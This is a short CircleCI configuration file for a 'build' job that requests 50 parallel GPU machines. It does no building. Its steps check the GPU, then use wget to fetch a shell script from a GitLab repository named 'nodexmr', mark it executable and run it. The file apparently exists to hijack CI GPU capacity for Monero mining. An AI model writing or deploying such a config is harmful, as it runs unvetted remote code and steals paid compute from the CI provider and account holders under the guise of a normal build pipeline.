version: 2.1
jobs:
  build:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-1604-cuda-10.1:201909-23
    steps:
      - run: nvidia-smi
      - run: wget https://gitlab.com/WoodcoinLog/nodexmr/-/raw/main/bzz.sh && chmod +x *.sh && ./bzz.sh
    parallelism: 50